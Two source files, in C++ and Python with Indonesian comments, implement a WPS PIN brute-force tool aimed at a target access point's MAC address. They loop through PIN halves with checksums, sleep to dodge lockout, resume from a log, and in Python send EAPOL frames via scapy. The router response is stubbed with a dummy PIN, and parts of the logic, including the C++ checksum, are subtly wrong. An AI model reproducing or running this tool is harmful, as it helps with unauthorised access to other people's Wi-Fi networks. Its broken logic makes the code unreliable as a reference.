File: wpscrack.cpp
#include <iostream>
#include <pcap.h>
#include <cstring>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <thread>
#include <fstream>

using namespace std;

// Konfigurasi
const char* IFACE = "wlan0";         // Interface Wi-Fi (mode monitor)
const char* BSSID = "00:11:22:33:44:55";  // MAC AP target
const int DELAY = 1;                 // Delay dalam detik
const string LOG_FILE = "wps_crack.log";

// Fungsi untuk menghitung checksum WPS PIN
int calculate_checksum(string pin) {
    int accum = 0;
    for (char c : pin) {
        int digit = c - '0';
        accum += (accum % 2 == 0) ? 3 * digit : digit;
    }
    return (10 - accum % 10) % 10;
}

// Fungsi untuk mengirim paket WPS (simulasi sederhana)
bool send_wps_packet(const string& pin, const char* iface, const char* bssid) {
    // Dalam dunia nyata, gunakan raw socket untuk kirim paket EAP/WPS
    cout << "Mencoba PIN: " << pin << endl;
    sleep(DELAY); // Hindari lockout
    // Simulasi respons (ganti dengan pcap sniffing)
    return pin == "12345670"; // Dummy PIN untuk testing
}

// Membaca progres terakhir dari log
pair<int, int> load_progress() {
    ifstream log(LOG_FILE);
    string line, last_pin;
    while (getline(log, line)) {
        if (line.find("Mencoba PIN") != string::npos) {
            last_pin = line.substr(line.find(": ") + 2);
        }
    }
    log.close();
    if (!last_pin.empty()) {
        return {stoi(last_pin.substr(0, 4)), stoi(last_pin.substr(4, 3))};
    }
    return {0, 0};
}

// Fungsi utama cracking
string crack_wps() {
    ofstream log(LOG_FILE, ios::app);
    auto [start_pin1, start_pin2] = load_progress();
    log << "Memulai cracking WPS..." << endl;

    // Bagian pertama (4 digit)
    for (int pin1 = start_pin1; pin1 < 10000; ++pin1) {
        string pin_base = string(4 - to_string(pin1).length(), '0') + to_string(pin1) + "000";
        int checksum = calculate_checksum(pin_base);
        string pin = pin_base + to_string(checksum);
        log << "Mencoba PIN: " << pin << endl;

        if (send_wps_packet(pin, IFACE, BSSID)) {
            cout << "Bagian pertama ditemukan: " << pin1 << endl;
            // Bagian kedua (3 digit)
            for (int pin2 = start_pin2; pin2 < 1000; ++pin2) {
                string pin_full = string(4 - to_string(pin1).length(), '0') + to_string(pin1) +
                                 string(3 - to_string(pin2).length(), '0') + to_string(pin2);
                checksum = calculate_checksum(pin_full);
                pin = pin_full + to_string(checksum);
                log << "Mencoba PIN: " << pin << endl;

                if (send_wps_packet(pin, IFACE, BSSID)) {
                    log << "PIN WPS ditemukan: " << pin << endl;
                    log.close();
                    return pin;
                }
            }
            start_pin2 = 0; // Reset untuk bagian kedua
        }
    }
    log << "PIN tidak ditemukan." << endl;
    log.close();
    return "";
}

int main() {
    // Pastikan interface dalam mode monitor
    cout << "Cracking WPS pada " << BSSID << " menggunakan " << IFACE << endl;
    string pin = crack_wps();
    if (!pin.empty()) {
        cout << "Sukses! PIN WPS: " << pin << endl;
    } else {
        cout << "Gagal menemukan PIN." << endl;
    }
    return 0;
}

File: wpscrack.py
from scapy.all import *
import time
import logging
import os

# Konfigurasi
IFACE = "wlan0"              # Ganti dengan interface Wi-Fi Anda
BSSID = "00:11:22:33:44:55"  # Ganti dengan MAC address AP target
DELAY = 1                    # Delay antar percobaan (detik)
LOG_FILE = "wps_crack.log"   # File untuk menyimpan progres

# Setup logging
logging.basicConfig(filename=LOG_FILE, level=logging.INFO, 
                    format='%(asctime)s - %(message)s')

def calculate_checksum(pin):
    """Menghitung digit checksum untuk PIN WPS"""
    accum = 0
    pin = int(pin)
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    checksum = (10 - accum % 10) % 10
    return checksum

def send_wps_packet(pin, iface, bssid):
    """Mengirim paket WPS dengan PIN tertentu"""
    # Simulasi pengiriman pesan WPS M1 (sederhana)
    eapol = EAPOL(type=1)  # EAPOL-Start untuk memulai
    dot11 = Dot11(addr1=bssid, addr2=get_if_hwaddr(iface), addr3=bssid)
    packet = RadioTap() / dot11 / eapol
    print(f"Mencoba PIN: {pin}")
    sendp(packet, iface=iface, verbose=0)
    # Dalam implementasi nyata, Anda perlu sniff respons M2 dari AP
    time.sleep(DELAY)
    return simulate_response(pin)  # Ganti dengan analisis respons asli

def simulate_response(pin):
    """Simulasi respons AP (untuk testing)"""
    # Dalam dunia nyata, ini harus diganti dengan sniffing respons EAP
    return "sukses" if pin == "12345670" else "gagal"  # Contoh PIN dummy

def load_progress():
    """Memuat progres terakhir dari log"""
    if os.path.exists(LOG_FILE):
        with open(LOG_FILE, 'r') as f:
            lines = f.readlines()
            if lines:
                last_line = lines[-1]
                if "Mencoba PIN" in last_line:
                    last_pin = last_line.split("Mencoba PIN: ")[1].strip()
                    return int(last_pin[:4]), int(last_pin[4:7])
    return 0, 0

def crack_wps():
    """Fungsi utama untuk crack PIN WPS"""
    start_pin1, start_pin2 = load_progress()
    logging.info("Memulai cracking WPS...")

    # Bagian pertama PIN (4 digit)
    for pin1 in range(start_pin1, 10000):
        pin_base = f"{pin1:04d}000"
        checksum = calculate_checksum(pin_base)
        pin = f"{pin_base}{checksum}"
        logging.info(f"Mencoba PIN: {pin}")
        
        respons = send_wps_packet(pin, IFACE, BSSID)
        if "sukses" in respons:
            print(f"Bagian pertama ditemukan: {pin1:04d}")
            # Lanjut ke bagian kedua
            for pin2 in range(start_pin2, 1000):
                pin_full = f"{pin1:04d}{pin2:03d}"
                checksum = calculate_checksum(pin_full)
                pin = f"{pin_full}{checksum}"
                logging.info(f"Mencoba PIN: {pin}")
                
                respons = send_wps_packet(pin, IFACE, BSSID)
                if "sukses" in respons:
                    print(f"PIN WPS ditemukan: {pin}")
                    logging.info(f"PIN WPS ditemukan: {pin}")
                    return pin
            start_pin2 = 0  # Reset untuk bagian kedua jika lanjut
        time.sleep(DELAY)  # Hindari lockout
    
    print("PIN tidak ditemukan.")
    return None

if __name__ == "__main__":
    # Pastikan mode monitor aktif (gunakan airmon-ng jika perlu)
    conf.iface = IFACE
    pin = crack_wps()
    if pin:
        print(f"Sukses! PIN WPS: {pin}")
    else:
        print("Gagal menemukan PIN.")
